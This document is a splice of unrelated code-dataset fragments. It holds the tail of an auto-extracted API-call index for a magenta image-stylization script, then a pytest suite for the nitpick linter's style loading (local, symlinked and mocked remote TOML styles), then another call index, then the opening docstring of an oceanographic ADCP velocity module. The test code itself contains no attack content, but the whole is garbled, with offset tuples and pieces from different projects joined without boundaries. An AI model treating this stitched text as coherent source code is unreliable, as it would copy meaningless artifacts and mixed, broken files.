magenta.models.image_stylization import image_utils\n'), ((3574, 3632), 'magenta.models.image_stylization.image_utils.resize_image', 'image_utils.resize_image', (['content_img_ph', 'FLAGS.image_size'], {}), '(content_img_ph, FLAGS.image_size)\n', (3598, 3632), False, 'from magenta.models.image_stylization import image_utils\n'), ((4033, 4077), 'tensorflow.compat.v1.train.latest_checkpoint', 'tf.train.latest_checkpoint', (['FLAGS.checkpoint'], {}), '(FLAGS.checkpoint)\n', (4059, 4077), True, 'import tensorflow.compat.v1 as tf\n'), ((4306, 4337), 'tf_slim.get_variables_to_restore', 'slim.get_variables_to_restore', ([], {}), '()\n', (4335, 4337), True, 'import tf_slim as slim\n'), ((4584, 4604), 'numpy.random.seed', 'np.random.seed', (['(1234)'], {}), '(1234)\n', (4598, 4604), True, 'import numpy as np\n'), ((4628, 4665), 'numpy.random.permutation', 'np.random.permutation', (['style_img_list'], {}), '(style_img_list)\n', (4649, 4665), True, 'import numpy as np\n'), ((2787, 2797), 'tensorflow.compat.v1.Graph', 'tf.Graph', ([], {}), '()\n', (2795, 2797), True, 'import tensorflow.compat.v1 as tf\n'), ((4353, 4385), 'tensorflow.compat.v1.local_variables_initializer', 'tf.local_variables_initializer', ([], {}), '()\n', (4383, 4385), True, 'import tensorflow.compat.v1 as tf\n'), ((4938, 4987), 'magenta.models.image_stylization.image_utils.load_np_image_uint8', 'image_utils.load_np_image_uint8', (['content_img_path'], {}), '(content_img_path)\n', (4969, 4987), False, 'from magenta.models.image_stylization import image_utils\n'), ((5097, 5131), 'os.path.basename', 'os.path.basename', (['content_img_path'], {}), '(content_img_path)\n', (5113, 5131), False, 'import os\n'), ((5421, 5480), 'os.path.join', 'os.path.join', (['FLAGS.output_dir', "('%s.jpg' % content_img_name)"], {}), "(FLAGS.output_dir, '%s.jpg' % content_img_name)\n", (5433, 5480), False, 'import os\n'), ((6945, 6990), 'ast.literal_eval', 'ast.literal_eval', (['FLAGS.interpolation_weights'], {}), '(FLAGS.interpolation_weights)\n', (6961, 6990), False, 'import ast\n'), ((5899, 5931), 'os.path.basename', 'os.path.basename', (['style_img_path'], {}), '(style_img_path)\n', (5915, 5931), False, 'import os\n'), ((5962, 6009), 'magenta.models.image_stylization.image_utils.load_np_image_uint8', 'image_utils.load_np_image_uint8', (['style_img_path'], {}), '(style_img_path)\n', (5993, 6009), False, 'from magenta.models.image_stylization import image_utils\n'), ((6135, 6245), 'tensorflow.compat.v1.logging.info', 'tf.logging.info', (["('Stylizing (%d) %s with (%d) %s' % (content_i, content_img_name, style_i,\n style_img_name))"], {}), "('Stylizing (%d) %s with (%d) %s' % (content_i,\n content_img_name, style_i, style_img_name))\n", (6150, 6245), True, 'import tensorflow.compat.v1 as tf\n'), ((6591, 6648), 'os.path.join', 'os.path.join', (['FLAGS.output_dir', "('%s.jpg' % style_img_name)"], {}), "(FLAGS.output_dir, '%s.jpg' % style_img_name)\n", (6603, 6648), False, 'import os\n'), ((7593, 7699), 'os.path.join', 'os.path.join', (['FLAGS.output_dir', "('%s_stylized_%s_%d.jpg' % (content_img_name, style_img_name, interp_i))"], {}), "(FLAGS.output_dir, '%s_stylized_%s_%d.jpg' % (content_img_name,\n style_img_name, interp_i))\n", (7605, 7699), False, 'import os\n')]
|
"""Style tests."""
# pylint: disable=no-member
from textwrap import dedent
from typing import TYPE_CHECKING
from unittest import mock
from unittest.mock import PropertyMock
import pytest
import responses
from nitpick.constants import DOT_SLASH, PYPROJECT_TOML, READ_THE_DOCS_URL, SETUP_CFG, TOML_EXTENSION, TOX_INI
from nitpick.violations import Fuss
from tests.helpers import SUGGESTION_BEGIN, SUGGESTION_END, XFAIL_ON_WINDOWS, ProjectMock, assert_conditions
if TYPE_CHECKING:
from pathlib import Path
@pytest.mark.parametrize("offline", [False, True])
def test_multiple_styles_overriding_values(offline, tmp_path):
"""Test multiple style files with precedence (the latest ones overrides the previous ones)."""
ProjectMock(tmp_path).named_style(
"isort1",
f"""
["{SETUP_CFG}".isort]
line_length = 80
known_first_party = "tests"
xxx = "aaa"
""",
).named_style(
"styles/isort2",
f"""
["{SETUP_CFG}".isort]
line_length = 120
xxx = "yyy"
""",
).named_style(
"flake8",
f"""
["{SETUP_CFG}".flake8]
inline-quotes = "double"
something = 123
""",
).named_style(
"black",
"""
["pyproject.toml".tool.black]
line-length = 100
something = 11
""",
).pyproject_toml(
"""
[tool.nitpick]
style = ["isort1", "styles/isort2", "flake8.toml", "black"]
[tool.black]
something = 22
"""
).flake8(
offline=offline
).assert_errors_contain(
f"""
NIP318 File pyproject.toml has missing values:{SUGGESTION_BEGIN}
[tool.black]
line-length = 100{SUGGESTION_END}
"""
).assert_errors_contain(
f"""
NIP319 File pyproject.toml has different values. Use this:{SUGGESTION_BEGIN}
[tool.black]
something = 11{SUGGESTION_END}
"""
).assert_errors_contain(
f"""
NIP321 File {SETUP_CFG} was not found. Create it with this content:{SUGGESTION_BEGIN}
[flake8]
inline-quotes = double
something = 123
[isort]
known_first_party = tests
line_length = 120
xxx = yyy{SUGGESTION_END}
"""
).cli_ls(
f"""
{PYPROJECT_TOML}
{SETUP_CFG}
"""
)
@pytest.mark.parametrize("offline", [False, True])
def test_include_styles_overriding_values(offline, tmp_path):
"""One style file can include another (also recursively). Ignore styles that were already included."""
ProjectMock(tmp_path).named_style(
"isort1",
f"""
[nitpick.styles]
include = "styles/isort2.toml"
["{SETUP_CFG}".isort]
line_length = 80
known_first_party = "tests"
xxx = "aaa"
""",
).named_style(
"styles/isort2",
f"""
[nitpick.styles]
include = ["styles/isort2.toml", "flake8.toml"]
["{SETUP_CFG}".isort]
line_length = 120
xxx = "yyy"
""",
).named_style(
"flake8",
f"""
[nitpick.styles]
include = ["black.toml"]
["{SETUP_CFG}".flake8]
inline-quotes = "double"
something = 123
""",
).named_style(
"black",
"""
[nitpick.styles]
include = ["styles/isort2.toml", "isort1.toml"]
["pyproject.toml".tool.black]
line-length = 100
""",
).pyproject_toml(
"""
[tool.nitpick]
style = "isort1"
"""
).flake8(
offline=offline
).assert_errors_contain(
f"""
NIP318 File pyproject.toml has missing values:{SUGGESTION_BEGIN}
[tool.black]
line-length = 100{SUGGESTION_END}
"""
).assert_errors_contain(
f"""
NIP321 File {SETUP_CFG} was not found. Create it with this content:{SUGGESTION_BEGIN}
[flake8]
inline-quotes = double
something = 123
[isort]
known_first_party = tests
line_length = 120
xxx = yyy{SUGGESTION_END}
"""
)
@pytest.mark.parametrize("offline", [False, True])
@mock.patch("nitpick.flake8.NitpickFlake8Extension.version", new_callable=PropertyMock(return_value="0.5.3"))
def test_minimum_version(mocked_version, offline, tmp_path):
"""Stamp a style file with a minimum required version, to indicate new features or breaking changes."""
assert_conditions(mocked_version == "0.5.3")
ProjectMock(tmp_path).named_style(
"parent",
"""
[nitpick.styles]
include = "child.toml"
["pyproject.toml".tool.black]
line-length = 100
""",
).named_style(
"child",
"""
[nitpick]
minimum_version = "1.0"
""",
).pyproject_toml(
"""
[tool.nitpick]
style = "parent"
[tool.black]
line-length = 100
"""
).flake8(
offline=offline
).assert_single_error(
"NIP203 The style file you're using requires nitpick>=1.0 (you have 0.5.3). Please upgrade"
)
@pytest.mark.parametrize("offline", [False, True])
@XFAIL_ON_WINDOWS
def test_relative_and_other_root_dirs(offline, tmp_path):
"""Test styles in relative and in other root dirs."""
another_dir: Path = tmp_path / "another_dir"
project = (
ProjectMock(tmp_path)
.named_style(
f"{another_dir}/main",
"""
[nitpick.styles]
include = "styles/pytest.toml"
""",
)
.named_style(
f"{another_dir}/styles/pytest",
"""
["pyproject.toml".tool.pytest]
some-option = 123
""",
)
.named_style(
f"{another_dir}/styles/black",
"""
["pyproject.toml".tool.black]
line-length = 99
missing = "value"
""",
)
.named_style(
f"{another_dir}/poetry",
"""
["pyproject.toml".tool.poetry]
version = "1.0"
""",
)
)
common_pyproject = """
[tool.black]
line-length = 99
[tool.pytest]
some-option = 123
"""
# Use full path on initial styles
project.pyproject_toml(
f"""
[tool.nitpick]
style = ["{another_dir}/main", "{another_dir}/styles/black"]
{common_pyproject}
"""
).flake8(offline=offline).assert_single_error(
f"""
NIP318 File pyproject.toml has missing values:{SUGGESTION_BEGIN}
[tool.black]
missing = "value"{SUGGESTION_END}
"""
)
# Reuse the first full path that appears
project.pyproject_toml(
f"""
[tool.nitpick]
style = ["{another_dir}/main", "styles/black.toml"]
{common_pyproject}
"""
).api_check().assert_violations(
Fuss(
False,
PYPROJECT_TOML,
318,
" has missing values:",
"""
[tool.black]
missing = "value"
""",
)
)
# Allow relative paths
project.pyproject_toml(
f"""
[tool.nitpick]
style = ["{another_dir}/styles/black", "../poetry"]
{common_pyproject}
"""
).flake8(offline=offline).assert_single_error(
f"""
NIP318 File pyproject.toml has missing values:{SUGGESTION_BEGIN}
[tool.black]
missing = "value"
[tool.poetry]
version = "1.0"{SUGGESTION_END}
"""
)
@pytest.mark.parametrize("offline", [False, True])
def test_symlink_subdir(offline, tmp_path):
"""Test relative styles in subdirectories of a symlink dir."""
target_dir: Path = tmp_path / "target_dir"
ProjectMock(tmp_path).named_style(
f"{target_dir}/parent",
"""
[nitpick.styles]
include = "styles/child.toml"
""",
).named_style(
f"{target_dir}/styles/child",
"""
["pyproject.toml".tool.black]
line-length = 86
""",
).create_symlink(
"symlinked-style.toml", target_dir, "parent.toml"
).pyproject_toml(
"""
[tool.nitpick]
style = "symlinked-style"
"""
).flake8(
offline=offline
).assert_single_error(
f"""
NIP318 File pyproject.toml has missing values:{SUGGESTION_BEGIN}
[tool.black]
line-length = 86{SUGGESTION_END}
"""
)
@responses.activate
def test_relative_style_on_urls(tmp_path):
"""Read styles from relative paths on URLs."""
base_url = "http://www.example.com/sub/folder"
mapping = {
"main": """
[nitpick.styles]
include = "styles/pytest.toml"
""",
"styles/pytest": """
["pyproject.toml".tool.pytest]
some-option = 123
""",
"styles/black": """
["pyproject.toml".tool.black]
line-length = 99
missing = "value"
""",
"poetry": """
["pyproject.toml".tool.poetry]
version = "1.0"
""",
}
for filename, body in mapping.items():
responses.add(responses.GET, f"{base_url}/{filename}.toml", dedent(body), status=200)
project = ProjectMock(tmp_path)
common_pyproject = """
[tool.black]
line-length = 99
[tool.pytest]
some-option = 123
"""
# Use full path on initial styles
project.pyproject_toml(
f"""
[tool.nitpick]
style = ["{base_url}/main", "{base_url}/styles/black.toml"]
{common_pyproject}
"""
).api_check().assert_violations(
Fuss(
False,
PYPROJECT_TOML,
318,
" has missing values:",
"""
[tool.black]
missing = "value"
""",
)
)
# Reuse the first full path that appears
project.pyproject_toml(
f"""
[tool.nitpick]
style = ["{base_url}/main.toml", "styles/black"]
{common_pyproject}
"""
).api_check().assert_violations(
Fuss(
False,
PYPROJECT_TOML,
318,
" has missing values:",
"""
[tool.black]
missing = "value"
""",
)
)
# Allow relative paths
project.pyproject_toml(
f"""
[tool.nitpick]
style = ["{base_url}/styles/black.toml", "../poetry"]
{common_pyproject}
"""
).api_check().assert_violations(
Fuss(
False,
PYPROJECT_TOML,
318,
" has missing values:",
"""
[tool.black]
missing = "value"
[tool.poetry]
version = "1.0"
""",
)
)
@responses.activate
@XFAIL_ON_WINDOWS
def test_local_style_should_override_settings(tmp_path):
"""Don't build relative URLs from local file names (starting with "./")."""
remote_url = "https://example.com/remote-style.toml"
remote_style = """
["pyproject.toml".tool.black]
line-length = 100
"""
responses.add(responses.GET, remote_url, dedent(remote_style), status=200)
local_file = "local-file.toml"
local_style = """
["pyproject.toml".tool.black]
line-length = 120
"""
ProjectMock(tmp_path).pyproject_toml(
f"""
[tool.nitpick]
style = [
"{remote_url}",
"{DOT_SLASH}{local_file}",
]
[tool.black]
line-length = 80
"""
).named_style(local_file, local_style).api_check().assert_violations(
Fuss(
False,
PYPROJECT_TOML,
319,
" has different values. Use this:",
"""
[tool.black]
line-length = 120
""",
)
)
@responses.activate
def test_fetch_private_github_urls(tmp_path):
"""Fetch private GitHub URLs with a token on the query string."""
base_url = "https://raw.githubusercontent.com/user/private_repo/branch/path/to/nitpick-style"
query_string = "?token=xxx"
full_private_url = f"{base_url}{TOML_EXTENSION}{query_string}"
body = """
["pyproject.toml".tool.black]
missing = "thing"
"""
responses.add(responses.GET, full_private_url, dedent(body), status=200)
project = ProjectMock(tmp_path).pyproject_toml(
f"""
[tool.nitpick]
style = "{base_url}{query_string}"
"""
)
project.flake8(offline=False).assert_single_error(
f"""
NIP318 File pyproject.toml has missing values:{SUGGESTION_BEGIN}
[tool.black]
missing = "thing"{SUGGESTION_END}
"""
)
project.flake8(offline=True).assert_no_errors()
@responses.activate
def test_include_remote_style_from_local_style(tmp_path):
"""Test include of remote style when there is only a local style."""
remote_style = "https://raw.githubusercontent.com/user/repo/branch/path/to/nitpick-style"
url_with_extension = f"{remote_style}{TOML_EXTENSION}"
body = """
["tox.ini".section]
key = "value"
"""
responses.add(responses.GET, url_with_extension, dedent(body), status=200)
project = ProjectMock(tmp_path).style(
f"""
[nitpick.styles]
include = [
"{remote_style}"
]
"""
)
project.assert_file_contents(TOX_INI, None).api_check_then_fix(
Fuss(True, TOX_INI, 321, " was not found. Create it with this content:", "[section]\nkey = value")
).assert_file_contents(
TOX_INI,
"""
[section]
key = value
""",
PYPROJECT_TOML,
None,
)
@pytest.mark.parametrize("offline", [False, True])
def test_merge_styles_into_single_file(offline, tmp_path):
"""Merge all styles into a single TOML file on the cache dir. Also test merging lists (pre-commit repos)."""
ProjectMock(tmp_path).named_style(
"black",
'''
["pyproject.toml".tool.black]
line-length = 120
[[".pre-commit-config.yaml".repos]]
yaml = """
- repo: https://github.com/psf/black
rev: 21.5b2
hooks:
- id: black
args: [--safe, --quiet]
- repo: https://github.com/asottile/blacken-docs
rev: v1.10.0
hooks:
- id: blacken-docs
additional_dependencies: [black==21.5b2]
"""
# TODO The toml library has issues loading arrays with multiline strings:
# https://github.com/uiri/toml/issues/123
# https://github.com/uiri/toml/issues/230
# If they are fixed one day, remove this 'yaml' key and use only a 'repos' list with a single element:
#[".pre-commit-config.yaml"]
#repos = ["""
#<YAML goes here>
#"""]
''',
).named_style(
"isort",
'''
["setup.cfg".isort]
line_length = 120
skip = ".tox,build"
known_first_party = "tests"
# The configuration below is needed for compatibility with black.
# https://github.com/python/black#how-black-wraps-lines
# https://github.com/PyCQA/isort#multi-line-output-modes
multi_line_output = 3
include_trailing_comma = true
force_grid_wrap = 0
combine_as_imports = true
[[".pre-commit-config.yaml".repos]]
yaml = """
- repo: https://github.com/PyCQA/isort
rev: 5.8.0
hooks:
- id: isort
"""
''',
).named_style(
"isort_overrides",
f"""
["{SETUP_CFG}".isort]
another_key = "some value"
multi_line_output = 6
""",
).pyproject_toml(
"""
[tool.nitpick]
style = ["black", "isort", "isort_overrides"]
"""
).flake8(
offline=offline
).assert_merged_style(
f'''
["pyproject.toml".tool.black]
line-length = 120
["{SETUP_CFG}".isort]
line_length = 120
skip = ".tox,build"
known_first_party = "tests"
# The configuration below is needed for compatibility with black.
# https://github.com/python/black#how-black-wraps-lines
# https://github.com/PyCQA/isort#multi-line-output-modes
multi_line_output = 6
include_trailing_comma = true
force_grid_wrap = 0
combine_as_imports = true
another_key = "some value"
[[".pre-commit-config.yaml".repos]]
yaml = """
- repo: https://github.com/psf/black
rev: 21.5b2
hooks:
- id: black
args: [--safe, --quiet]
- repo: https://github.com/asottile/blacken-docs
rev: v1.10.0
hooks:
- id: blacken-docs
additional_dependencies: [black==21.5b2]
"""
[[".pre-commit-config.yaml".repos]]
yaml = """
- repo: https://github.com/PyCQA/isort
rev: 5.8.0
hooks:
- id: isort
"""
'''
)
@pytest.mark.parametrize("offline", [False, True])
def test_invalid_tool_nitpick_on_pyproject_toml(offline, tmp_path):
"""Test invalid [tool.nitpick] on pyproject.toml."""
project = ProjectMock(tmp_path)
for style, error_message in [
(
'style = [""]\nextra_values = "also raise warnings"',
f"extra_values: Unknown configuration. See {READ_THE_DOCS_URL}configuration.html."
+ "\nstyle.0: Shorter than minimum length 1.",
),
('style = ""', "style: Shorter than minimum length 1."),
("style = 1", "style: Not a valid string."),
(
'style = ["some_file",""," "]',
"style.1: Shorter than minimum length 1.\nstyle.2: Shorter than minimum length 1.",
),
]:
project.pyproject_toml(f"[tool.nitpick]\n{style}").flake8(offline=offline).assert_errors_contain(
"NIP001 File pyproject.toml has an incorrect style."
+ f" Invalid data in [tool.nitpick]:{SUGGESTION_BEGIN}\n{error_message}{SUGGESTION_END}",
1,
)
def test_invalid_toml(tmp_path):
"""Invalid TOML should emit a NIP warning, not raise TomlDecodeError."""
ProjectMock(tmp_path).style(
f"""
["{SETUP_CFG}".flake8]
ignore = D100,D104,D202,E203,W503
"""
).api_check_then_fix(
Fuss(
False,
"nitpick-style.toml",
1,
" has an incorrect style. Invalid TOML"
" (toml.decoder.TomlDecodeError: This float doesn't have a leading digit (line 2 column 1 char 21))",
)
)
@pytest.mark.parametrize("offline", [False, True])
def test_invalid_nitpick_files(offline, tmp_path):
"""Invalid [nitpick.files] section."""
ProjectMock(tmp_path).named_style(
"some_style",
"""
[xxx]
wrong = "section"
""",
).named_style(
"wrong_files",
"""
[nitpick.files.whatever]
wrong = "section"
""",
).pyproject_toml(
"""
[tool.nitpick]
style = ["some_style", "wrong_files"]
"""
).flake8(
offline=offline
).assert_errors_contain(
f"""
NIP001 File some_style.toml has an incorrect style. Invalid config:{SUGGESTION_BEGIN}
xxx: Unknown file. See {READ_THE_DOCS_URL}plugins.html.{SUGGESTION_END}
"""
).assert_errors_contain(
f"""
NIP001 File wrong_files.toml has an incorrect style. Invalid config:{SUGGESTION_BEGIN}
nitpick.files.whatever: Unknown file. See {READ_THE_DOCS_URL}nitpick_section.html#nitpick-files.{SUGGESTION_END}
""",
2,
)
@responses.activate
def test_github_fetch(tmp_path):
"""Test that gh:// and github:// URLs can be fetched."""
raw_url = "https://raw.githubusercontent.com/andreoliwa/nitpick/develop"
data = [
(
f"{raw_url}/initial.toml",
"""
[nitpick.styles]
include = "black.toml"
""",
),
(
f"{raw_url}/black.toml",
"""
["pyproject.toml".tool.black]
line-length = 120
""",
),
]
for url, style in data:
responses.add(responses.GET, url, dedent(style), status=200)
responses.add(responses.GET, "https://api.github.com/repos/andreoliwa/nitpick", """{"default_branch": "develop"}""")
ProjectMock(tmp_path).pyproject_toml(
"""
[tool.nitpick]
style = [
"github://andreoliwa/nitpick/initial.toml",
]
"""
).api_check().assert_violations(
Fuss(
False,
PYPROJECT_TOML,
318,
" has missing values:",
"""
[tool.black]
line-length = 120
""",
)
)
|
[
"textwrap.dedent",
"nitpick.violations.Fuss",
"unittest.mock.PropertyMock",
"tests.helpers.assert_conditions",
"responses.add",
"pytest.mark.parametrize",
"tests.helpers.ProjectMock"
] |
[((513, 562), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""offline"""', '[False, True]'], {}), "('offline', [False, True])\n", (536, 562), False, 'import pytest\n'), ((2396, 2445), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""offline"""', '[False, True]'], {}), "('offline', [False, True])\n", (2419, 2445), False, 'import pytest\n'), ((4177, 4226), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""offline"""', '[False, True]'], {}), "('offline', [False, True])\n", (4200, 4226), False, 'import pytest\n'), ((5183, 5232), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""offline"""', '[False, True]'], {}), "('offline', [False, True])\n", (5206, 5232), False, 'import pytest\n'), ((7686, 7735), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""offline"""', '[False, True]'], {}), "('offline', [False, True])\n", (7709, 7735), False, 'import pytest\n'), ((13962, 14011), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""offline"""', '[False, True]'], {}), "('offline', [False, True])\n", (13985, 14011), False, 'import pytest\n'), ((17416, 17465), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""offline"""', '[False, True]'], {}), "('offline', [False, True])\n", (17439, 17465), False, 'import pytest\n'), ((19024, 19073), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""offline"""', '[False, True]'], {}), "('offline', [False, True])\n", (19047, 19073), False, 'import pytest\n'), ((4510, 4554), 'tests.helpers.assert_conditions', 'assert_conditions', (["(mocked_version == '0.5.3')"], {}), "(mocked_version == '0.5.3')\n", (4527, 4554), False, 'from tests.helpers import SUGGESTION_BEGIN, SUGGESTION_END, XFAIL_ON_WINDOWS, ProjectMock, assert_conditions\n'), ((9437, 9458), 'tests.helpers.ProjectMock', 'ProjectMock', (['tmp_path'], {}), '(tmp_path)\n', (9448, 9458), False, 'from tests.helpers import SUGGESTION_BEGIN, SUGGESTION_END, XFAIL_ON_WINDOWS, ProjectMock, assert_conditions\n'), ((17605, 17626), 'tests.helpers.ProjectMock', 'ProjectMock', (['tmp_path'], {}), '(tmp_path)\n', (17616, 17626), False, 'from tests.helpers import SUGGESTION_BEGIN, SUGGESTION_END, XFAIL_ON_WINDOWS, ProjectMock, assert_conditions\n'), ((20723, 20843), 'responses.add', 'responses.add', (['responses.GET', '"""https://api.github.com/repos/andreoliwa/nitpick"""', '"""{"default_branch": "develop"}"""'], {}), '(responses.GET,\n \'https://api.github.com/repos/andreoliwa/nitpick\',\n \'{"default_branch": "develop"}\')\n', (20736, 20843), False, 'import responses\n'), ((4301, 4335), 'unittest.mock.PropertyMock', 'PropertyMock', ([], {'return_value': '"""0.5.3"""'}), "(return_value='0.5.3')\n", (4313, 4335), False, 'from unittest.mock import PropertyMock\n'), ((7017, 7153), 'nitpick.violations.Fuss', 'Fuss', (['(False)', 'PYPROJECT_TOML', '(318)', '""" has missing values:"""', '"""\n [tool.black]\n missing = "value"\n """'], {}), '(False, PYPROJECT_TOML, 318, \' has missing values:\',\n """\n [tool.black]\n missing = "value"\n """)\n', (7021, 7153), False, 'from nitpick.violations import Fuss\n'), ((9843, 9979), 'nitpick.violations.Fuss', 'Fuss', (['(False)', 'PYPROJECT_TOML', '(318)', '""" has missing values:"""', '"""\n [tool.black]\n missing = "value"\n """'], {}), '(False, PYPROJECT_TOML, 318, \' has missing values:\',\n """\n [tool.black]\n missing = "value"\n """)\n', (9847, 9979), False, 'from nitpick.violations import Fuss\n'), ((10304, 10440), 'nitpick.violations.Fuss', 'Fuss', (['(False)', 'PYPROJECT_TOML', '(318)', '""" has missing 
values:"""', '"""\n [tool.black]\n missing = "value"\n """'], {}), '(False, PYPROJECT_TOML, 318, \' has missing values:\',\n """\n [tool.black]\n missing = "value"\n """)\n', (10308, 10440), False, 'from nitpick.violations import Fuss\n'), ((10752, 10948), 'nitpick.violations.Fuss', 'Fuss', (['(False)', 'PYPROJECT_TOML', '(318)', '""" has missing values:"""', '"""\n [tool.black]\n missing = "value"\n\n [tool.poetry]\n version = "1.0"\n """'], {}), '(False, PYPROJECT_TOML, 318, \' has missing values:\',\n """\n [tool.black]\n missing = "value"\n\n [tool.poetry]\n version = "1.0"\n """\n )\n', (10756, 10948), False, 'from nitpick.violations import Fuss\n'), ((11391, 11411), 'textwrap.dedent', 'dedent', (['remote_style'], {}), '(remote_style)\n', (11397, 11411), False, 'from textwrap import dedent\n'), ((11866, 12014), 'nitpick.violations.Fuss', 'Fuss', (['(False)', 'PYPROJECT_TOML', '(319)', '""" has different values. Use this:"""', '"""\n [tool.black]\n line-length = 120\n """'], {}), '(False, PYPROJECT_TOML, 319, \' has different values. Use this:\',\n """\n [tool.black]\n line-length = 120\n """)\n', (11870, 12014), False, 'from nitpick.violations import Fuss\n'), ((12565, 12577), 'textwrap.dedent', 'dedent', (['body'], {}), '(body)\n', (12571, 12577), False, 'from textwrap import dedent\n'), ((13447, 13459), 'textwrap.dedent', 'dedent', (['body'], {}), '(body)\n', (13453, 13459), False, 'from textwrap import dedent\n'), ((18765, 18949), 'nitpick.violations.Fuss', 'Fuss', (['(False)', '"""nitpick-style.toml"""', '(1)', '""" has an incorrect style. Invalid TOML (toml.decoder.TomlDecodeError: This float doesn\'t have a leading digit (line 2 column 1 char 21))"""'], {}), '(False, \'nitpick-style.toml\', 1,\n " has an incorrect style. Invalid TOML (toml.decoder.TomlDecodeError: This float doesn\'t have a leading digit (line 2 column 1 char 21))"\n )\n', (18769, 18949), False, 'from nitpick.violations import Fuss\n'), ((21057, 21193), 'nitpick.violations.Fuss', 'Fuss', (['(False)', 'PYPROJECT_TOML', '(318)', '""" has missing values:"""', '"""\n [tool.black]\n line-length = 120\n """'], {}), '(False, PYPROJECT_TOML, 318, \' has missing values:\',\n """\n [tool.black]\n line-length = 120\n """)\n', (21061, 21193), False, 'from nitpick.violations import Fuss\n'), ((9396, 9408), 'textwrap.dedent', 'dedent', (['body'], {}), '(body)\n', (9402, 9408), False, 'from textwrap import dedent\n'), ((12606, 12627), 'tests.helpers.ProjectMock', 'ProjectMock', (['tmp_path'], {}), '(tmp_path)\n', (12617, 12627), False, 'from tests.helpers import SUGGESTION_BEGIN, SUGGESTION_END, XFAIL_ON_WINDOWS, ProjectMock, assert_conditions\n'), ((13488, 13509), 'tests.helpers.ProjectMock', 'ProjectMock', (['tmp_path'], {}), '(tmp_path)\n', (13499, 13509), False, 'from tests.helpers import SUGGESTION_BEGIN, SUGGESTION_END, XFAIL_ON_WINDOWS, ProjectMock, assert_conditions\n'), ((20691, 20704), 'textwrap.dedent', 'dedent', (['style'], {}), '(style)\n', (20697, 20704), False, 'from textwrap import dedent\n'), ((13708, 13813), 'nitpick.violations.Fuss', 'Fuss', (['(True)', 'TOX_INI', '(321)', '""" was not found. Create it with this content:"""', '"""[section]\nkey = value"""'], {}), '(True, TOX_INI, 321, \' was not found. 
Create it with this content:\',\n """[section]\nkey = value""")\n', (13712, 13813), False, 'from nitpick.violations import Fuss\n'), ((18604, 18625), 'tests.helpers.ProjectMock', 'ProjectMock', (['tmp_path'], {}), '(tmp_path)\n', (18615, 18625), False, 'from tests.helpers import SUGGESTION_BEGIN, SUGGESTION_END, XFAIL_ON_WINDOWS, ProjectMock, assert_conditions\n'), ((20845, 20866), 'tests.helpers.ProjectMock', 'ProjectMock', (['tmp_path'], {}), '(tmp_path)\n', (20856, 20866), False, 'from tests.helpers import SUGGESTION_BEGIN, SUGGESTION_END, XFAIL_ON_WINDOWS, ProjectMock, assert_conditions\n'), ((5440, 5461), 'tests.helpers.ProjectMock', 'ProjectMock', (['tmp_path'], {}), '(tmp_path)\n', (5451, 5461), False, 'from tests.helpers import SUGGESTION_BEGIN, SUGGESTION_END, XFAIL_ON_WINDOWS, ProjectMock, assert_conditions\n'), ((11560, 11581), 'tests.helpers.ProjectMock', 'ProjectMock', (['tmp_path'], {}), '(tmp_path)\n', (11571, 11581), False, 'from tests.helpers import SUGGESTION_BEGIN, SUGGESTION_END, XFAIL_ON_WINDOWS, ProjectMock, assert_conditions\n'), ((4559, 4580), 'tests.helpers.ProjectMock', 'ProjectMock', (['tmp_path'], {}), '(tmp_path)\n', (4570, 4580), False, 'from tests.helpers import SUGGESTION_BEGIN, SUGGESTION_END, XFAIL_ON_WINDOWS, ProjectMock, assert_conditions\n'), ((7898, 7919), 'tests.helpers.ProjectMock', 'ProjectMock', (['tmp_path'], {}), '(tmp_path)\n', (7909, 7919), False, 'from tests.helpers import SUGGESTION_BEGIN, SUGGESTION_END, XFAIL_ON_WINDOWS, ProjectMock, assert_conditions\n'), ((14188, 14209), 'tests.helpers.ProjectMock', 'ProjectMock', (['tmp_path'], {}), '(tmp_path)\n', (14199, 14209), False, 'from tests.helpers import SUGGESTION_BEGIN, SUGGESTION_END, XFAIL_ON_WINDOWS, ProjectMock, assert_conditions\n'), ((19172, 19193), 'tests.helpers.ProjectMock', 'ProjectMock', (['tmp_path'], {}), '(tmp_path)\n', (19183, 19193), False, 'from tests.helpers import SUGGESTION_BEGIN, SUGGESTION_END, XFAIL_ON_WINDOWS, ProjectMock, assert_conditions\n'), ((2619, 2640), 'tests.helpers.ProjectMock', 'ProjectMock', (['tmp_path'], {}), '(tmp_path)\n', (2630, 2640), False, 'from tests.helpers import SUGGESTION_BEGIN, SUGGESTION_END, XFAIL_ON_WINDOWS, ProjectMock, assert_conditions\n'), ((729, 750), 'tests.helpers.ProjectMock', 'ProjectMock', (['tmp_path'], {}), '(tmp_path)\n', (740, 750), False, 'from tests.helpers import SUGGESTION_BEGIN, SUGGESTION_END, XFAIL_ON_WINDOWS, ProjectMock, assert_conditions\n')]
|
#!/usr/bin/env python
"""
@package ion_functions.data.adcp_functions
@file ion_functions/data/adcp_functions.py
@author <NAME>, <NAME>, <NAME>
@brief Module containing ADCP related data-calculations.
"""
import numpy as np
from ion_functions.data.generic_functions import magnetic_declination
from ion_functions.data.generic_functions import replace_fill_with_nan
# instrument fill value unprocessed by CI
# (bad beam velocity sentinel output by tRDI ADCP instruments)
ADCP_FILLVALUE = -32768
"""
**** For instruments programmed in beam coordinates:
(ADCPS-I,K; ADCPT-B,D,E)
adcp_beam_eastward -- calculates VELPROF-VLE_L1
adcp_beam_northward -- calculates VELPROF-VLN_L1
adcp_beam_vertical -- calculates VELPROF-VLU_L1
adcp_beam_error -- calculates VELPROF-ERR_L1
**** For instruments programmed in earth coordinates:
(ADCPA; ADCPS-J,L,N; ADCPT-C,F,G,M)
adcp_earth_eastward -- calculates VELPROF-VLE_L1
adcp_earth_northward -- calculates VELPROF-VLN_L1
adcp_earth_vertical -- calculates VELPROF-VLU_L1
adcp_earth_error -- calculates VELPROF-ERR_L1
**** For the VADCP programmed in beam coordinates:
vadcp_beam_eastward -- calculates VELTURB-VLE_L1
vadcp_beam_northward -- calculates VELTURB-VLN_L1
vadcp_beam_vertical_true -- calculates VELTURB-VLU-5BM_L1
vadcp_beam_vertical_est -- calculates VELTURB-VLU-4BM_L1
vadcp_beam_error -- calculates VELTURB-ERR_L1
